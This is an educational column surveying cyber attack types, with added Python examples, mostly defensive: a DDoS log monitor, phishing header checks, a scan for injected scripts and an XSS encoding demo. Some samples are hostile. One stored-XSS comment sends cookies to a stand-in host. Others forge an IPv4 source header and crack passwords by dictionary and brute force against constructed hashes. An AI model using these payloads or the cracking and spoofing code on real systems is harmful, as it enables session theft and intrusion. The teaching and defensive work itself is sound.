Previously we introduced the subject by defining the term “cyber attack”.
We defined it as any action taken to harm a computer network or system, whether for political ends, sabotage, financial gain or other motives.
The most widely reported cyber attacks vary in motive: some are regarded as political, others as activism, sabotage, state-sponsored and so on.
Cyber attacks are not only associated with, and initiated by, military operations; civilians who know what they are doing also launch cyber attacks.
With the increase of easy-to-use tools on the internet, anyone with a motive can launch a cyber attack.
We continue by looking at the tools and techniques used to conduct a cyber attack.
Botnets
Botnets are networks of systems infected with malware and placed under an attacker’s control, most commonly to carry out distributed denial-of-service (DDoS) attacks.
These bots, or zombie systems, are directed at a target, often overwhelming the target system’s bandwidth and processing capacity.
DDoS attacks are difficult to trace and to block because the bots are spread across many geographic locations and networks, so no single source stands out.
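Why the distributed part matters can be seen in a monitor. The Python below is an added example written for this column’s editing, not code from the original article: it parses constructed web-server log lines (a quiet baseline, then one second in which sixty bot addresses send two requests each) and applies two rules. A per-address limit, the first thing many administrators reach for, never fires because every bot stays under it; only the aggregate requests-per-second rule catches the flood. The addresses, timestamps and thresholds are all assumptions for the demonstration.

```python
import re
from collections import defaultdict

# Common Log Format with a per-second timestamp; only the fields we need are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')


def build_sample_log():
    """Constructed traffic, not a real capture: three quiet seconds with four
    regular clients, then one second in which 60 distinct bot addresses
    (198.51.100.0/24, a documentation range) send two requests each."""
    lines = []
    for sec in range(3):
        for client in range(1, 5):
            lines.append(f'203.0.113.{client} - - [10/Oct/2023:13:55:0{sec} +0000] '
                         f'"GET /index.html HTTP/1.1" 200')
    for bot in range(1, 61):
        for _ in range(2):
            lines.append(f'198.51.100.{bot} - - [10/Oct/2023:13:55:03 +0000] '
                         f'"GET /index.html HTTP/1.1" 200')
    return lines


def analyse_log(lines, per_ip_limit=10, aggregate_limit=50):
    """Group requests per second and apply two rules (thresholds are assumed values):
    - per_ip_limit: one source exceeding N requests/s (catches a single noisy host)
    - aggregate_limit: total requests/s exceeding M regardless of source
    A botnet stays under the first rule and is only caught by the second."""
    per_sec = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip unparseable lines rather than crash the monitor
        per_sec[m["ts"]][m["ip"]] += 1

    report = {}
    for ts, sources in per_sec.items():
        total = sum(sources.values())
        busiest = max(sources.values())
        report[ts] = {
            "requests": total,
            "distinct_sources": len(sources),
            "max_per_ip": busiest,
            "flagged_per_ip": busiest > per_ip_limit,
            "flagged_aggregate": total > aggregate_limit,
        }
    return report


if __name__ == "__main__":
    for ts, row in analyse_log(build_sample_log()).items():
        print(ts, row)
```

The lesson for a practitioner is that per-source rate limiting is not a DDoS defence on its own; capacity-level monitoring, upstream filtering and scrubbing services are what absorb traffic that arrives from thousands of addresses at once.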
Man-in-the-Middle (MitM) Attack
A MitM attack occurs when an attacker inserts itself between a client and a server and relays, reads or alters the traffic between them, while each side believes it is talking directly to the other.
Here are some common types of man-in-the-middle attacks:
Session Hijacking
In this type of MitM attack, an attacker takes over an established session between a trusted client and a network server.
The attacking computer substitutes its own address for that of the trusted client (or presents the client’s stolen session identifier), and the server continues the session, believing it is still communicating with the client.
IP Spoofing
Internet Protocol (IP) spoofing is used by an attacker to convince a system that it is communicating with a known, trusted entity, in order to gain access to that system. The attacker sends a packet bearing the IP source address of a known, trusted host instead of its own.
The target host may accept the packet and act on it, because nothing in the IP header itself proves where a packet came from.
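To show why the substitution described under session hijacking and IP spoofing is so easy, here is an added Python example (written for this edit, not taken from the column) that builds a raw IPv4 header with the source address of a supposedly trusted host and then decodes it the way a receiving system would. Only the bytes are constructed; nothing is sent. The addresses are documentation-range assumptions: 192.0.2.10 plays the trusted host whose identity is borrowed, 198.51.100.20 the target.

```python
import socket
import struct

# version/IHL, DSCP/ECN, total length, identification, flags/fragment,
# TTL, protocol, header checksum, source address, destination address
IPV4_FMT = "!BBHHHBBH4s4s"


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 header checksum: ones' complement of the ones' complement sum
    of the header's 16-bit words. A valid header sums to zero under this check."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src: str, dst: str, payload_len: int = 0, proto: int = 6, ttl: int = 64) -> bytes:
    """Build a 20-byte IPv4 header. The source address is simply a field the
    sender writes; no part of the header authenticates it."""
    ver_ihl = (4 << 4) | 5  # IPv4, five 32-bit words, no options
    hdr = struct.pack(IPV4_FMT, ver_ihl, 0, 20 + payload_len, 0x1234, 0, ttl, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    csum = ipv4_checksum(hdr)  # computed with the checksum field set to zero
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:]


def parse_ipv4_header(raw: bytes) -> dict:
    """Decode the fields a receiving host sees. checksum_ok only proves the header
    was not corrupted in transit; it says nothing about who sent it."""
    f = struct.unpack(IPV4_FMT, raw[:20])
    return {
        "version": f[0] >> 4,
        "ihl": f[0] & 0x0F,
        "total_length": f[2],
        "ttl": f[5],
        "protocol": f[6],
        "checksum_ok": ipv4_checksum(raw[:20]) == 0,
        "src": socket.inet_ntoa(f[8]),
        "dst": socket.inet_ntoa(f[9]),
    }


if __name__ == "__main__":
    # Assumed scenario: the attacker writes the trusted host's address as source.
    forged = build_ipv4_header(src="192.0.2.10", dst="198.51.100.20", payload_len=20)
    print(forged.hex())
    print(parse_ipv4_header(forged))
```

Sending such a packet needs raw-socket privilege, and the reply goes to the real 192.0.2.10 rather than to the attacker, which is why blind spoofing is mostly used for one-way traffic such as floods and for abusing address-based trust. The defences follow directly: never grant access on the strength of a source address alone, and have networks drop packets whose source addresses could not legitimately originate from them (ingress filtering, BCP 38).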
Phishing and spear-phishing attacks
A phishing attack is a practice of sending emails that appear to be from trusted sources with the goal of gaining personal information or influencing users to do something.
It combines social engineering and technical trickery.
Spear phishing is a highly targeted form of phishing.
Attackers take the time to conduct research into targets and create messages that are personal and relevant.
Because of this, spear phishing can be very hard to identify and even harder to defend against.
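Hard to defend against is not the same as invisible. The Python below is an added example (written for this edit, not part of the original column) that runs three simple header checks over two constructed e-mails: a display name that shows one address while the message really comes from another, a Reply-To that diverts replies to a third domain, and a domain that borrows a trusted brand name without being the trusted domain. The bank name, domains and sample messages are assumptions for the demonstration.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from typing import List, Optional

# Assumption for the example: the domains a genuine message from the bank would use.
TRUSTED_DOMAINS = {"examplebank.com"}
ADDR_IN_TEXT = re.compile(r"[\w.+-]+@([\w-]+(?:\.[\w-]+)+)")

# Constructed sample messages; only the headers matter here.
LEGIT = """From: Example Bank <alerts@examplebank.com>
To: customer@example.org
Subject: Your monthly statement is ready

Your statement is attached.
"""

PHISH = """From: "Example Bank - support@examplebank.com" <alerts@secure-mail-login.net>
Reply-To: verify@examplebank-security.com
To: customer@example.org
Subject: Urgent: confirm your account within 24 hours

Click the link below to verify your details.
"""


def domain_of(addr: str) -> str:
    return addr.rpartition("@")[2].lower()


def lookalike_of(domain: str) -> Optional[str]:
    """Return the trusted domain this one imitates: the brand word reused inside a
    different registered domain (examplebank-security.com, examplebank.com.evil.net)."""
    for trusted in TRUSTED_DOMAINS:
        brand = trusted.split(".")[0]
        if domain != trusted and not domain.endswith("." + trusted) and brand in domain:
            return trusted
    return None


def analyse_headers(raw: str) -> List[str]:
    msg = message_from_string(raw)
    name, addr = parseaddr(msg.get("From", ""))
    from_domain = domain_of(addr)
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    reply_domain = domain_of(reply_addr)
    findings = []

    # 1. The display name shows an address from a domain other than the real sender's.
    m = ADDR_IN_TEXT.search(name)
    if m and m.group(1).lower() != from_domain:
        findings.append(f"display name shows {m.group(1)} but the sender is {from_domain}")

    # 2. Replies are diverted to a third domain.
    if reply_domain and reply_domain != from_domain:
        findings.append(f"reply-to domain {reply_domain} differs from sender domain {from_domain}")

    # 3. Either domain borrows the trusted brand without being the trusted domain.
    for dom in {from_domain, reply_domain} - {""}:
        imitated = lookalike_of(dom)
        if imitated:
            findings.append(f"{dom} looks like {imitated}")
    return findings


if __name__ == "__main__":
    print("legit:", analyse_headers(LEGIT))
    print("phish:", analyse_headers(PHISH))
```

These are heuristics for triage and user training, not proof: the authoritative signals are the SPF, DKIM and DMARC results the receiving mail server records, and a well-crafted spear-phishing message may pass all three checks above while still being fraudulent.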
Drive-by download attack
Drive-by download attacks are a common method of spreading malware.
Attackers look for insecure websites and plant a malicious script in the HTML or server-side (for example PHP) code of one of the pages.
This script might install malware directly onto the computer of someone who visits the site, or it might redirect the victim to a site controlled by the attackers.
Drive-by downloads can happen when visiting a website or viewing an email message or a pop-up window.
Unlike many other types of cybersecurity attacks, a drive-by doesn’t rely on the user doing anything to actively enable the attack: you don’t have to click a download button or open a malicious email attachment to become infected.
A drive-by download takes advantage of an app, operating system or web browser that contains security flaws because updates have failed or have not been applied.
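The planted script is usually foreign to the site, which is what a site owner can look for. As an added example for this edit (not code from the original column), the Python below inventories every script and iframe on a constructed page and flags those that load from hosts outside the site’s own list, together with inline scripts that redirect the visitor. The page content, the allowed hosts and the 203.0.113.66 attacker address are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the hosts this site legitimately loads scripts and frames from.
ALLOWED_HOSTS = {"www.example.org", "cdn.example.org"}

# Constructed page: the site's own scripts plus an injected external script,
# an injected inline redirect and a hidden iframe, the pattern described above.
SAMPLE_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.org/lib.js"></script>
<script src="https://203.0.113.66/x.js"></script>
</head><body>
<h1>Welcome</h1>
<script>window.location="http://203.0.113.66/landing";</script>
<iframe src="http://203.0.113.66/frame" width="0" height="0"></iframe>
</body></html>"""


class ScriptInventory(HTMLParser):
    """Collect external script sources, inline script bodies and iframe targets."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self.iframes = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.external.append(a["src"])
            else:
                self._in_script = True
        elif tag == "iframe" and a.get("src"):
            self.iframes.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data.strip())


def host_of(url: str) -> str:
    return urlparse(url).hostname or ""  # relative URL: same origin, no host


def find_suspicious(html: str, allowed_hosts=ALLOWED_HOSTS):
    inv = ScriptInventory()
    inv.feed(html)
    findings = []
    for src in inv.external:
        host = host_of(src)
        if host and host not in allowed_hosts:
            findings.append(f"external script from unapproved host {host}: {src}")
    for body in inv.inline:
        if "location" in body or "document.write" in body or "eval(" in body:
            findings.append(f"inline script with redirect/eval pattern: {body[:60]}")
    for src in inv.iframes:
        host = host_of(src)
        if host and host not in allowed_hosts:
            findings.append(f"iframe to unapproved host {host}: {src}")
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_PAGE):
        print(finding)
```

Run against a site’s pages on a schedule, a check like this catches the defacement that starts a drive-by campaign; a Content Security Policy that lists the same allowed hosts makes the browser refuse foreign scripts even when the check is late. It does nothing for the visitor’s side, where keeping the browser and its plug-ins patched remains the defence the text describes.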
Password attack
Because passwords are the most commonly used mechanism to authenticate users to an information system, obtaining passwords is a common and effective attack approach.
Access to a person’s password can be obtained by looking around the person’s desk, “sniffing” the network connection to acquire unencrypted passwords, using social engineering, gaining access to a password database, or outright guessing.
The last approach can be done either at random or systematically, through brute-force and dictionary attacks.
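What systematic guessing looks like against a stolen password database, and what makes it expensive, is shown in the added Python example below (written for this edit, not part of the original column). The leaked table, the users and the word list are constructed. A dictionary attack hashes each candidate once and looks up every user in the result; a brute-force attack tries every string up to a given length; and the last two functions show the defence, a per-user random salt with a deliberately slow hash (PBKDF2), which forces the attacker to recompute every candidate for every user.

```python
import hashlib
import itertools
import os
import string

# Constructed word list, in the order an attacker would try it.
WORDLIST = ["123456", "password", "qwerty", "letmein", "password123", "dragon"]


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


# Constructed "stolen" password database storing unsalted SHA-256 digests.
UNSALTED_DB = {
    "alice": sha256_hex("password123"),
    "bob": sha256_hex("zx9"),
    "carol": sha256_hex("correct horse battery staple"),
}


def dictionary_attack(db: dict, wordlist) -> dict:
    """Hash each candidate once, then look every user up in the table: the cost
    is len(wordlist) hashes however many users leaked."""
    table = {sha256_hex(w): w for w in wordlist}
    return {user: table[d] for user, d in db.items() if d in table}


def brute_force(digest: str, alphabet=string.ascii_lowercase + string.digits, max_len=3):
    """Systematic search of every string up to max_len. Feasible only for short
    passwords: 36^3 is about 47,000 candidates, 36^8 is about 2.8 trillion."""
    for n in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=n):
            candidate = "".join(chars)
            if sha256_hex(candidate) == digest:
                return candidate
    return None


def pbkdf2(password: str, salt: bytes, rounds: int) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)


def make_salted_db(passwords: dict, rounds: int = 50_000) -> dict:
    """Defensive storage: a random 16-byte salt per user and a slow hash."""
    db = {}
    for user, pw in passwords.items():
        salt = os.urandom(16)
        db[user] = (salt, pbkdf2(pw, salt, rounds))
    return db


def dictionary_attack_salted(db: dict, wordlist, rounds: int = 50_000):
    """With salts the lookup table cannot be shared: every (user, word) pair needs
    its own slow hash. Returns the cracked users and the number of hashes computed."""
    cracked, hashes = {}, 0
    for user, (salt, digest) in db.items():
        for w in wordlist:
            hashes += 1
            if pbkdf2(w, salt, rounds) == digest:
                cracked[user] = w
                break
    return cracked, hashes


if __name__ == "__main__":
    print(dictionary_attack(UNSALTED_DB, WORDLIST))
    print(brute_force(UNSALTED_DB["bob"]))
    salted = make_salted_db({"alice": "password123", "bob": "zx9"}, rounds=50_000)
    print(dictionary_attack_salted(salted, WORDLIST, rounds=50_000))
```

Note that salting and slow hashing do not save alice: a password that is on the list falls either way, only more slowly. They protect the users whose passwords are not on any list, and they are why a leaked database of properly stored hashes is far less damaging than one of unsalted digests.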
SQL injection attack
Structured Query Language (SQL) injection has become a common issue with database-driven websites.
It occurs when an attacker gets the database to execute SQL of the attacker’s choosing by supplying it in the input data sent from the client to the server.
SQL fragments are inserted into data-plane input (for example, into the login or password field) so that the application concatenates them into its query and the database runs them as commands.
A successful SQL injection exploit can read sensitive data from the database, modify (insert, update or delete) database data, execute administration operations (such as shutdown) on the database, recover the content of a given file, and, in some cases, issue commands to the operating system.
Cross-site scripting (XSS) attack
Cross-site scripting (XSS) attacks cause a script of the attacker’s choosing to run in the victim’s web browser in the context of a trusted website, with access to that site’s cookies and session.
In a stored XSS attack, the attacker injects a payload containing malicious JavaScript into the website’s database, for example through a comment form, and the site then serves it to every visitor who views that page; in a reflected XSS attack the payload travels in a link the victim clicks and is echoed straight back by the server.
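The server’s mistake, and its correction, is shown in the added Python example below (written for this edit, not part of the original column). A constructed comment containing a script is rendered into a page template twice, once by raw interpolation and once with context-aware output encoding; a small HTML parser then counts what a browser would execute. The template, the comment texts and the 203.0.113.66 collection address are assumptions.

```python
import html
from html.parser import HTMLParser

# Constructed stored comment, as submitted through the site's comment form.
ATTACKER_COMMENT = '<script>fetch("https://203.0.113.66/steal?c=" + document.cookie)</script>'
NORMAL_COMMENT = 'Nice article! 5 > 3, "quoted" & done.'
# Constructed author name that tries to break out of an attribute value.
ATTACKER_AUTHOR = 'x" onmouseover="alert(1)'

TEMPLATE = '<div class="comment" data-author="{author}">{body}</div>'


def render_vulnerable(author: str, body: str) -> str:
    """Raw interpolation: whatever was stored is sent to the browser as markup."""
    return TEMPLATE.format(author=author, body=body)


def render_safe(author: str, body: str) -> str:
    """Output encoding for each context: text content through html.escape, and
    the attribute value with quotes escaped as well so it cannot close the attribute."""
    return TEMPLATE.format(author=html.escape(author, quote=True),
                           body=html.escape(body, quote=False))


class ActiveContentCounter(HTMLParser):
    """Count what a browser would execute: script elements and on* event handlers."""

    def __init__(self):
        super().__init__()
        self.scripts = 0
        self.event_handlers = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1
        self.event_handlers += sum(1 for name, _ in attrs if name.lower().startswith("on"))


def active_content(rendered: str) -> int:
    parser = ActiveContentCounter()
    parser.feed(rendered)
    return parser.scripts + parser.event_handlers


if __name__ == "__main__":
    for author, body in [("bob", ATTACKER_COMMENT), (ATTACKER_AUTHOR, "hi"), ("carol", NORMAL_COMMENT)]:
        print("vulnerable:", render_vulnerable(author, body), active_content(render_vulnerable(author, body)))
        print("safe:      ", render_safe(author, body), active_content(render_safe(author, body)))
```

The escaped page shows the attacker’s text to readers exactly as typed, which is the correct behaviour: the data is not rejected or stripped, it is simply never interpreted as markup. Encoding has to match the context (HTML text, attribute, JavaScript string, URL), and a Content Security Policy plus the HttpOnly cookie flag limit the damage when an encoding is missed.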
Eavesdropping attack
Eavesdropping attacks occur through the interception of network traffic.
By eavesdropping, an attacker can obtain passwords, credit card numbers and other confidential information that a user might be sending over the network.
Birthday attack
Birthday attacks are made against hash algorithms that are used to verify the integrity of a message, software or digital signature.
A message of any length, processed by a hash function, produces a message digest (MD) of fixed length, independent of the length of the input message.
The birthday attack exploits the probability of finding two different messages that produce the same MD, which is far higher than intuition suggests: for an n-bit digest roughly 2^(n/2) attempts suffice, not 2^n.
If an attacker can produce two messages with the same MD, one harmless and one malicious, he can have the harmless one approved or signed and then substitute the malicious one; the receiver will not detect the replacement even if he compares the MDs.
Malware attack
Malware is unwanted software installed on a system without the owner’s consent. It can attach itself to legitimate code and propagate; it can lurk in useful applications or replicate itself across the Internet.
Here are some of the most common types of malware: macro viruses, file infectors, system or boot-record infectors, polymorphic viruses, stealth viruses, trojans, logic bombs, worms, droppers, ransomware, adware and others.
Sources of cyber attack weapons
Actors who consciously decide to conduct cyber attacks can potentially cause harm to any system that is directly or indirectly connected to the Internet.
1) Botnet Command and Control Operators: Botnet operators use a network of compromised, remotely controlled systems (zombies) to coordinate attacks and to spread phishing schemes, spam and malware.
2) Organised Criminal Groups: Organised criminal groups attack systems for financial gain. They use sophisticated spam, phishing, spyware and other malware to commit identity theft and online fraud.
3) Hackers: Hackers break into networks for the thrill of the challenge, for bragging rights in the hacker community, for protest or revenge, to stalk others, for monetary gain, and for other reasons.
4) Insiders: Insiders may access data out of curiosity or with intent; their knowledge of the target system typically gives them largely unrestricted access, allowing them to damage the system or steal its data.
5) Nation States: Nations use cyber tools as part of their intelligence-gathering and espionage activities.
The series concludes in the next editions with chapters three and four.
The author is a speaker, mentor, educator, trainer, professional and community leader, and an IT and cybersecurity leader. For comments email ICTMatters@kingston.co.zm; www.kingston.co.zm.